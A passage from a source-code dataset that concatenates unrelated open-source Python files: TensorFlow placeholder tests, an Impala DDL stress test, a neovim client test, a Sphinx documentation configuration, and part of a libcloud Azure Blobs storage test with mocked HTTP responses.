p = array_ops.placeholder_v2(tf.float32, shape=None, name="p")
p_identity = tf.identity(p)
# can feed anything
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={
p: feed_array
}), feed_array)
feed_array = np.random.rand(4, 2, 5)
self.assertAllClose(
p_identity.eval(feed_dict={
p: feed_array
}), feed_array)
def testScalarShape(self):
with self.test_session():
p = array_ops.placeholder_v2(tf.float32, shape=[], name="p")
p_identity = tf.identity(p)
self.assertAllClose(p_identity.eval(feed_dict={p: 5}), 5)
def testPartialShape(self):
with self.test_session():
p = array_ops.placeholder_v2(tf.float32, shape=[None, 3], name="p")
p_identity = tf.identity(p)
feed_array = np.random.rand(10, 3)
self.assertAllClose(
p_identity.eval(feed_dict={
p: feed_array
}), feed_array)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: "Cannot feed value of shape" in str(e)):
p_identity.eval(feed_dict={p: feed_array[:5, :2]})
def testControlDependency(self):
with self.test_session():
p = array_ops.placeholder_v2(tf.int32, shape=[], name="p")
with tf.control_dependencies([p]):
c = tf.constant(5, tf.int32)
d = tf.mul(p, c)
val = np.array(2).astype(np.int)
self.assertEqual(10, d.eval(feed_dict={p: val}))
def testBadShape(self):
with self.assertRaises(ValueError):
array_ops.placeholder_v2(tf.float32, shape=(-1, 10))
def testTensorStr(self):
a = array_ops.placeholder_v2(tf.float32, shape=None, name="a")
self.assertEqual("<tf.Tensor 'a:0' shape=<unknown> dtype=float32>", repr(a))
b = array_ops.placeholder_v2(tf.int32, shape=(32, 40), name="b")
self.assertEqual("<tf.Tensor 'b:0' shape=(32, 40) dtype=int32>", repr(b))
c = array_ops.placeholder_v2(tf.qint32, shape=(32, None, 2), name="c")
self.assertEqual("<tf.Tensor 'c:0' shape=(32, ?, 2) dtype=qint32>", repr(c))
class PlaceholderWithDefaultTest(tf.test.TestCase):
def testFullShape(self):
with self.test_session():
p = tf.placeholder_with_default([[2, 2], [2, 2]], shape=[2, 2])
a = tf.identity(p)
self.assertAllEqual([[2, 2], [2, 2]], a.eval())
self.assertAllEqual([[3, 3], [3, 3]],
a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[6, 6, 6], [6, 6, 6]]})
def testPartialShape(self):
with self.test_session():
p = tf.placeholder_with_default([1, 2, 3], shape=[None])
a = tf.identity(p)
self.assertAllEqual([1, 2, 3], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
with self.assertRaises(ValueError):
a.eval(feed_dict={p: [[2, 2], [2, 2]]})
def testNoShape(self):
with self.test_session():
p = tf.placeholder_with_default([17], shape=None)
a = tf.identity(p)
self.assertAllEqual([17], a.eval())
self.assertAllEqual([3, 37], a.eval(feed_dict={p: [3, 37]}))
self.assertAllEqual([[3, 3], [3, 3]],
a.eval(feed_dict={p: [[3, 3], [3, 3]]}))
if __name__ == "__main__":
tf.test.main()
| kamcpp/tensorflow | tensorflow/python/kernel_tests/constant_op_test.py | Python | apache-2.0 | 26,533 |
#!/usr/bin/env python
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import re
import uuid
from subprocess import call
from tests.common.test_vector import TestDimension
from tests.common.impala_test_suite import ImpalaTestSuite
# Number of tables to create per thread
NUM_TBLS_PER_THREAD = 10
# Each client will get a different test id.
TEST_IDS = xrange(0, 10)
# Simple stress test for DDL operations. Attempts to create, cache,
# uncache, then drop many different tables in parallel.
class TestDdlStress(ImpalaTestSuite):
@classmethod
def get_workload(self):
return 'targeted-stress'
@classmethod
def add_test_dimensions(cls):
super(TestDdlStress, cls).add_test_dimensions()
cls.TestMatrix.add_dimension(TestDimension('test_id', *TEST_IDS))
cls.TestMatrix.add_constraint(lambda v: v.get_value('exec_option')['batch_size'] == 0)
cls.TestMatrix.add_constraint(lambda v:\
v.get_value('table_format').file_format == 'text' and\
v.get_value('table_format').compression_codec == 'none')
@pytest.mark.stress
def test_create_cache_many_tables(self, vector):
self.client.set_configuration(vector.get_value('exec_option'))
self.client.execute("create database if not exists ddl_stress_testdb")
self.client.execute("use ddl_stress_testdb")
tbl_uniquifier = str(uuid.uuid4()).replace('-', '')
for i in xrange(NUM_TBLS_PER_THREAD):
tbl_name = "tmp_%s_%s" % (tbl_uniquifier, i)
# Create a partitioned and unpartitioned table
self.client.execute("create table %s (i int)" % tbl_name)
self.client.execute("create table %s_part (i int) partitioned by (j int)" %\
tbl_name)
# Add some data to each
self.client.execute("insert overwrite table %s select int_col from "\
"functional.alltypestiny" % tbl_name)
self.client.execute("insert overwrite table %s_part partition(j) "\
"values (1, 1), (2, 2), (3, 3), (4, 4), (4, 4)" % tbl_name)
# Cache the data the unpartitioned table
self.client.execute("alter table %s set cached in 'testPool'" % tbl_name)
# Cache, uncache, then re-cache the data in the partitioned table.
self.client.execute("alter table %s_part set cached in 'testPool'" % tbl_name)
self.client.execute("alter table %s_part set uncached" % tbl_name)
self.client.execute("alter table %s_part set cached in 'testPool'" % tbl_name)
# Drop the tables, this should remove the cache requests.
self.client.execute("drop table %s" % tbl_name)
self.client.execute("drop table %s_part" % tbl_name)
| mapr/impala | tests/stress/test_ddl_stress.py | Python | apache-2.0 | 3,153 |
from nose.tools import with_setup, eq_ as eq
from common import vim, cleanup
from threading import Timer
@with_setup(setup=cleanup)
def test_interrupt_from_another_thread():
session = vim.session
timer = Timer(0.5, lambda: session.threadsafe_call(lambda: session.stop()))
timer.start()
eq(vim.session.next_message(), None)
| traverseda/python-client | test/test_concurrency.py | Python | apache-2.0 | 341 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# shablona documentation build configuration file, created by
# sphinx-quickstart on Tue Apr 14 10:29:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# General information about the project.
project = 'shablona'
copyright = '2015, Ariel Rokem'
currentdir = os.path.abspath(os.path.dirname(__file__))
ver_file = os.path.join(currentdir, '..', project, 'version.py')
with open(ver_file) as f:
exec(f.read())
source_version = __version__
currentdir = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(currentdir, 'tools'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0' # numpydoc requires sphinc >= 1.0
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
sys.path.append(os.path.abspath('sphinxext'))
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.autosummary',
'sphinx.ext.mathjax',
'math_dollar', # has to go before numpydoc
'numpydoc',
'github',
'sphinx_gallery.gen_gallery']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# --- Sphinx Gallery ---
sphinx_gallery_conf = {
# path to your examples scripts
'examples_dirs': '../examples',
# path where to save gallery generated examples
'gallery_dirs': 'auto_examples',
# To auto-generate example sections in the API
'doc_module': ('shablona',),
# Auto-generated mini-galleries go here
'backreferences_dir': 'gen_api'
}
# Automatically generate stub pages for API
autosummary_generate = True
autodoc_default_flags = ['members', 'inherited-members']
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {'**': ['localtoc.html', 'searchbox.html']}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
html_domain_indices = False
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'shablonadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'shablona.tex', 'shablona Documentation',
'Ariel Rokem', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'shablona', 'shablona Documentation',
['Ariel Rokem'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'shablona', 'shablona Documentation',
'Ariel Rokem', 'shablona', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
texinfo_domain_indices = False
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
| neurohackweek/avalanche | doc/conf.py | Python | apache-2.0 | 9,704 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import os
import sys
import tempfile
from io import BytesIO
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import urlparse
from libcloud.utils.py3 import parse_qs
from libcloud.utils.py3 import b
from libcloud.utils.py3 import basestring
from libcloud.common.types import InvalidCredsError
from libcloud.common.types import LibcloudError
from libcloud.storage.base import Container, Object
from libcloud.storage.types import ContainerDoesNotExistError
from libcloud.storage.types import ContainerIsNotEmptyError
from libcloud.storage.types import ContainerAlreadyExistsError
from libcloud.storage.types import InvalidContainerNameError
from libcloud.storage.types import ObjectDoesNotExistError
from libcloud.storage.types import ObjectHashMismatchError
from libcloud.storage.drivers.azure_blobs import AzureBlobsStorageDriver
from libcloud.storage.drivers.azure_blobs import AZURE_BLOCK_MAX_SIZE
from libcloud.storage.drivers.azure_blobs import AZURE_PAGE_CHUNK_SIZE
from libcloud.test import unittest
from libcloud.test import MockHttp, generate_random_data # pylint: disable-msg=E0611
from libcloud.test.file_fixtures import StorageFileFixtures # pylint: disable-msg=E0611
from libcloud.test.secrets import STORAGE_AZURE_BLOBS_PARAMS
class AzureBlobsMockHttp(MockHttp, unittest.TestCase):
fixtures = StorageFileFixtures('azure_blobs')
base_headers = {}
def _UNAUTHORIZED(self, method, url, body, headers):
return (httplib.UNAUTHORIZED,
'',
self.base_headers,
httplib.responses[httplib.UNAUTHORIZED])
def _list_containers_EMPTY(self, method, url, body, headers):
body = self.fixtures.load('list_containers_empty.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _list_containers(self, method, url, body, headers):
query_string = urlparse.urlsplit(url).query
query = parse_qs(query_string)
if 'marker' not in query:
body = self.fixtures.load('list_containers_1.xml')
else:
body = self.fixtures.load('list_containers_2.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _test_container_EMPTY(self, method, url, body, headers):
if method == 'DELETE':
body = u''
return (httplib.ACCEPTED,
body,
self.base_headers,
httplib.responses[httplib.ACCEPTED])
else:
body = self.fixtures.load('list_objects_empty.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _new__container_INVALID_NAME(self, method, url, body, headers):
return (httplib.BAD_REQUEST,
body,
self.base_headers,
httplib.responses[httplib.BAD_REQUEST])
def _test_container(self, method, url, body, headers):
query_string = urlparse.urlsplit(url).query
query = parse_qs(query_string)
if 'marker' not in query:
body = self.fixtures.load('list_objects_1.xml')
else:
body = self.fixtures.load('list_objects_2.xml')
return (httplib.OK,
body,
self.base_headers,
httplib.responses[httplib.OK])
def _test_container100(self, method, url, body, headers):
body = ''
if method != 'HEAD':
return (httplib.BAD_REQUEST,
body,
self.base_headers,
httplib.responses[httplib.BAD_REQUEST])
return (httplib.NOT_FOUND,
body,
self.base_headers,
httplib.responses[httplib.NOT_FOUND])
def _test_container200(self, method, url, body, headers):
body = ''
if method != 'HEAD':
return (httplib.BAD_REQUEST,
body,
self.base_headers,
httplib.responses[httplib.BAD_REQUEST])
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
headers['last-modified'] = 'Fri, 04 Jan 2013 09:48:06 GMT'
headers['x-ms-lease-status'] = 'unlocked'
headers['x-ms-lease-state'] = 'available'
headers['x-ms-meta-meta1'] = 'value1'
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _test_container200_test(self, method, url, body, headers):
body = ''
if method != 'HEAD':
return (httplib.BAD_REQUEST,
body,
self.base_headers,
httplib.responses[httplib.BAD_REQUEST])
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
headers['last-modified'] = 'Fri, 04 Jan 2013 09:48:06 GMT'
headers['content-length'] = '12345'
headers['content-type'] = 'application/zip'
headers['x-ms-blob-type'] = 'Block'
headers['x-ms-lease-status'] = 'unlocked'
headers['x-ms-lease-state'] = 'available'
headers['x-ms-meta-rabbits'] = 'monkeys'
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _test2_test_list_containers(self, method, url, body, headers):
# test_get_object
body = self.fixtures.load('list_containers.xml')
headers = {'content-type': 'application/zip',
'etag': '"e31208wqsdoj329jd"',
'x-amz-meta-rabbits': 'monkeys',
'content-length': '12345',
'last-modified': 'Thu, 13 Sep 2012 07:13:22 GMT'
}
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _new_container_ALREADY_EXISTS(self, method, url, body, headers):
# test_create_container
return (httplib.CONFLICT,
body,
headers,
httplib.responses[httplib.CONFLICT])
def _new_container(self, method, url, body, headers):
# test_create_container, test_delete_container
headers = {}
if method == 'PUT':
status = httplib.CREATED
headers['etag'] = '0x8CFB877BB56A6FB'
headers['last-modified'] = 'Fri, 04 Jan 2013 09:48:06 GMT'
headers['x-ms-lease-status'] = 'unlocked'
headers['x-ms-lease-state'] = 'available'
headers['x-ms-meta-meta1'] = 'value1'
elif method == 'DELETE':
status = httplib.NO_CONTENT
return (status,
body,
headers,
httplib.responses[status])
def _new_container_DOESNT_EXIST(self, method, url, body, headers):
# test_delete_container
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.NOT_FOUND])
def _foo_bar_container_NOT_FOUND(self, method, url, body, headers):
# test_delete_container_not_found
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.NOT_FOUND])
def _foo_bar_container_foo_bar_object_NOT_FOUND(self, method, url, body,
headers):
# test_delete_object_not_found
return (httplib.NOT_FOUND,
body,
headers,
httplib.responses[httplib.NOT_FOUND])
def _foo_bar_container_foo_bar_object_DELETE(self, method, url, body, headers):
# test_delete_object
return (httplib.ACCEPTED,
body,
headers,
httplib.responses[httplib.ACCEPTED])
def _foo_bar_container_foo_test_upload(self, method, url, body, headers):
# test_upload_object_success
self._assert_content_length_header_is_string(headers=headers)
body = ''
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
headers['content-md5'] = 'd4fe4c9829f7ca1cc89db7ad670d2bbd'
return (httplib.CREATED,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_block(self, method, url,
body, headers):
# test_upload_object_success
self._assert_content_length_header_is_string(headers=headers)
body = ''
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
return (httplib.CREATED,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_page(self, method, url,
body, headers):
# test_upload_object_success
body = ''
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
return (httplib.CREATED,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_blocklist(self, method, url,
body, headers):
# test_upload_object_success
self._assert_content_length_header_is_string(headers=headers)
body = ''
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
headers['content-md5'] = 'd4fe4c9829f7ca1cc89db7ad670d2bbd'
return (httplib.CREATED,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_lease(self, method, url,
body, headers):
# test_upload_object_success
self._assert_content_length_header_is_string(headers=headers)
action = headers['x-ms-lease-action']
rheaders = {'x-ms-lease-id': 'someleaseid'}
body = ''
if action == 'acquire':
return (httplib.CREATED,
body,
rheaders,
httplib.responses[httplib.CREATED])
else:
if headers.get('x-ms-lease-id', None) != 'someleaseid':
return (httplib.BAD_REQUEST,
body,
rheaders,
httplib.responses[httplib.BAD_REQUEST])
return (httplib.OK,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_test_upload_INVALID_HASH(self, method, url,
body, headers):
# test_upload_object_invalid_hash1
self._assert_content_length_header_is_string(headers=headers)
body = ''
headers = {}
headers['etag'] = '0x8CFB877BB56A6FB'
headers['content-md5'] = 'd4fe4c9829f7ca1cc89db7ad670d2bbd'
return (httplib.CREATED,
body,
headers,
httplib.responses[httplib.CREATED])
def _foo_bar_container_foo_bar_object(self, method, url, body, headers):
# test_upload_object_invalid_file_size
self._assert_content_length_header_is_string(headers=headers)
body = generate_random_data(1000)
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _foo_bar_container_foo_bar_object_INVALID_SIZE(self, method, url,
body, headers):
# test_upload_object_invalid_file_size
self._assert_content_length_header_is_string(headers=headers)
body = ''
return (httplib.OK,
body,
headers,
httplib.responses[httplib.OK])
def _assert_content_length_header_is_string(self, headers):
if 'Content-Length' in headers:
self.assertTrue(isinstance(headers['Content-Length'], basestring))
class AzureBlobsTests(unittest.TestCase):
driver_type = AzureBlobsStorageDriver
driver_args = STORAGE_AZURE_BLOBS_PARAMS
mock_response_klass = AzureBlobsMockHttp
@classmethod
def create_driver(self):
return self.driver_type(*self.driver_args)
def setUp(self):
self.driver_type.connectionCls.conn_class = self.mock_response_klass
self.mock_response_klass.type = None
self.driver = self.create_driver()
def tearDown(self):
self._remove_test_file()
def _remove_test_file(self):
file_path = os.path.abspath(__file__) + '.temp'
try:
os.unlink(file_path)
except OSError:
pass
def test_invalid_credentials(self):
self.mock_response_klass.type = 'UNAUTHORIZED'
try:
self.driver.list_containers()
except InvalidCredsError:
e = sys.exc_info()[1]
self.assertEqual(True, isinstance(e, InvalidCredsError))
else:
self.fail('Exception was not thrown')
def test_list_containers_empty(self):
self.mock_response_klass.type = 'list_containers_EMPTY'
containers = self.driver.list_containers()
self.assertEqual(len(containers), 0)
def test_list_containers_success(self):
self.mock_response_klass.type = 'list_containers'
AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2
containers = self.driver.list_containers()
self.assertEqual(len(containers), 4)
self.assertTrue('last_modified' in containers[1].extra)
self.assertTrue('url' in containers[1].extra)
self.assertTrue('etag' in containers[1].extra)
self.assertTrue('lease' in containers[1].extra)
self.assertTrue('meta_data' in containers[1].extra)
def test_list_container_objects_empty(self):
self.mock_response_klass.type = 'EMPTY'
container = Container(name='test_container', extra={},
driver=self.driver)
objects = self.driver.list_container_objects(container=container)
self.assertEqual(len(objects), 0)
def test_list_container_objects_success(self):
self.mock_response_klass.type = None
AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2
container = Container(name='test_container', extra={},
driver=self.driver)
objects = self.driver.list_container_objects(container=container)
self.assertEqual(len(objects), 4)
obj = objects[1]
self.assertEqual(obj.name, 'object2.txt')
self.assertEqual(obj.hash, '0x8CFB90F1BA8CD8F')
self.assertEqual(obj.size, 1048576)
self.assertEqual(obj.container.name, 'test_container')
self.assertTrue('meta1' in obj.meta_data)
self.assertTrue('meta2' in obj.meta_data)
self.assertTrue('last_modified' in obj.extra)
self.assertTrue('content_type' in obj.extra)
self.assertTrue('content_encoding' in obj.extra)
self.assertTrue('content_language' in obj.extra)
def test_get_container_doesnt_exist(self):
self.mock_response_klass.type = None
try:
self.driver.get_container(container_name='test_container100')
except ContainerDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_get_container_success(self):
self.mock_response_klass.type = None
container = self.driver.get_container(
container_name='test_container200')
self.assertTrue(container.name, 'test_container200')
self.assertTrue(container.extra['etag'], '0x8CFB877BB56A6FB')
self.assertTrue(container.extra['last_modified'],
'Fri, 04 Jan 2013 09:48:06 GMT')
self.assertTrue(container.extra['lease']['status'], 'unlocked')
self.assertTrue(container.extra['lease']['state'], 'available')
self.assertTrue(container.extra['meta_data']['meta1'], 'value1')
def test_get_object_container_doesnt_exist(self):
# This method makes two requests which makes mocking the response a bit
# trickier
self.mock_response_klass.type = None
try:
self.driver.get_object(container_name='test_container100',
object_name='test')
except ContainerDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_get_object_success(self):
# This method makes two requests which makes mocking the response a bit
# trickier
self.mock_response_klass.type = None
obj = self.driver.get_object(container_name='test_container200',
object_name='test')
self.assertEqual(obj.name, 'test')
self.assertEqual(obj.container.name, 'test_container200')
self.assertEqual(obj.size, 12345)
self.assertEqual(obj.hash, '0x8CFB877BB56A6FB')
self.assertEqual(obj.extra['last_modified'],
'Fri, 04 Jan 2013 09:48:06 GMT')
self.assertEqual(obj.extra['content_type'], 'application/zip')
self.assertEqual(obj.meta_data['rabbits'], 'monkeys')
def test_create_container_invalid_name(self):
# invalid container name
self.mock_response_klass.type = 'INVALID_NAME'
try:
self.driver.create_container(container_name='new--container')
except InvalidContainerNameError:
pass
else:
self.fail('Exception was not thrown')
def test_create_container_already_exists(self):
# container with this name already exists
self.mock_response_klass.type = 'ALREADY_EXISTS'
try:
self.driver.create_container(container_name='new-container')
except ContainerAlreadyExistsError:
pass
else:
self.fail('Exception was not thrown')
def test_create_container_success(self):
# success
self.mock_response_klass.type = None
name = 'new-container'
container = self.driver.create_container(container_name=name)
self.assertEqual(container.name, name)
def test_delete_container_doesnt_exist(self):
container = Container(name='new_container', extra=None,
driver=self.driver)
self.mock_response_klass.type = 'DOESNT_EXIST'
try:
self.driver.delete_container(container=container)
except ContainerDoesNotExistError:
pass
else:
self.fail('Exception was not thrown')
def test_delete_container_not_empty(self):
self.mock_response_klass.type = None
AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2
container = Container(name='test_container', extra={},
driver=self.driver)
try:
self.driver.delete_container(container=container)
except ContainerIsNotEmptyError:
pass
else:
self.fail('Exception was not thrown')
def test_delete_container_success(self):
self.mock_response_klass.type = 'EMPTY'
AzureBlobsStorageDriver.RESPONSES_PER_REQUEST = 2
container = Container(name='test_container', extra={},
driver=self.driver)
self.assertTrue(self.driver.delete_container(container=container))
def test_delete_container_not_found(self):
self.mock_response_klass.type = 'NOT_FOUND'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
try:
self.driver.delete_container(container=container)
except ContainerDoesNotExistError:
pass
else:
self.fail('Container does not exist but an exception was not' +
'thrown')
def test_download_object_success(self):
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
destination_path = os.path.abspath(__file__) + '.temp'
result = self.driver.download_object(obj=obj,
destination_path=destination_path,
overwrite_existing=False,
delete_on_failure=True)
self.assertTrue(result)
def test_download_object_invalid_file_size(self):
self.mock_response_klass.type = 'INVALID_SIZE'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
destination_path = os.path.abspath(__file__) + '.temp'
result = self.driver.download_object(obj=obj,
destination_path=destination_path,
overwrite_existing=False,
delete_on_failure=True)
self.assertFalse(result)
def test_download_object_invalid_file_already_exists(self):
self.mock_response_klass.type = 'INVALID_SIZE'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
destination_path = os.path.abspath(__file__)
try:
self.driver.download_object(obj=obj,
destination_path=destination_path,
overwrite_existing=False,
delete_on_failure=True)
except LibcloudError:
pass
else:
self.fail('Exception was not thrown')
def test_download_object_as_stream_success(self):
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
obj = Object(name='foo_bar_object', size=1000, hash=None, extra={},
container=container, meta_data=None,
driver=self.driver_type)
stream = self.driver.download_object_as_stream(obj=obj,
chunk_size=None)
self.assertTrue(hasattr(stream, '__iter__'))
def test_upload_object_invalid_ex_blob_type(self):
# Invalid hash is detected on the amazon side and BAD_REQUEST is
# returned
file_path = os.path.abspath(__file__)
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
try:
self.driver.upload_object(file_path=file_path, container=container,
object_name=object_name,
verify_hash=True,
ex_blob_type='invalid-blob')
except LibcloudError:
e = sys.exc_info()[1]
self.assertTrue(str(e).lower().find('invalid blob type') != -1)
else:
self.fail('Exception was not thrown')
def test_upload_object_invalid_md5(self):
# Invalid md5 is returned by azure
self.mock_response_klass.type = 'INVALID_HASH'
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
file_path = os.path.abspath(__file__)
try:
self.driver.upload_object(file_path=file_path, container=container,
object_name=object_name,
verify_hash=True)
except ObjectHashMismatchError:
pass
else:
self.fail(
'Invalid hash was returned but an exception was not thrown')
def test_upload_small_block_object_success(self):
file_path = os.path.abspath(__file__)
file_size = os.stat(file_path).st_size
container = Container(name='foo_bar_container', extra={},
driver=self.driver)
object_name = 'foo_test_upload'
